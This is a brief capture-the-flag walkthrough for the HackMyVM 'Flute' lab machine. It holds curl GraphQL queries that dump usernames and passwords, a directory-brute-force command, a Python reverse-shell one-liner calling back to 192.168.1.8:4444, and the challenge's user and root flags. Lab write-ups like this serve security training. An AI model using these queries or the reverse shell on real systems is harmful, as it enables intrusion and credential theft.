
https://hackmyvm.eu/machines/machine.php?vm=Flute



curl --request POST--header 'content-type: application/json'--url 'http://192.168.1.24:8888/'--data '{"query":"query { __typename }"}'

__typename
curl -X POST http://192.168.1.24:8888/-H "Content-Type: application/json"--data '{"query":"{ __type(name: "User") { name kind fields { name type { name kind } } } }"}'

{"data":{"__type":{"name":"User","kind":"OBJECT","fields":[{"name":"username","type":{"name":"String","kind":"SCALAR"}},{"name":"password","type":{"name":"String","kind":"SCALAR"}}]}}}
curl -X POST http://192.168.1.24:8888/-H "Content-Type: application/json"--data '{"query":"query { users { username password } }"}'

{"data":{"users":[{"username":"admin","password":"imtherealadmin"},{"username":"hamelin","password":"comewithmerats"}]}}

feroxbuster -u http://192.168.1.24:8888 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x txt,php,html,zip,bak



HMVuser9f4ndbaz4chc6j04b3va





"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'"


HMVrootoepsamqu0liphzzsc7x9
© 版权声明
THE END











暂无评论内容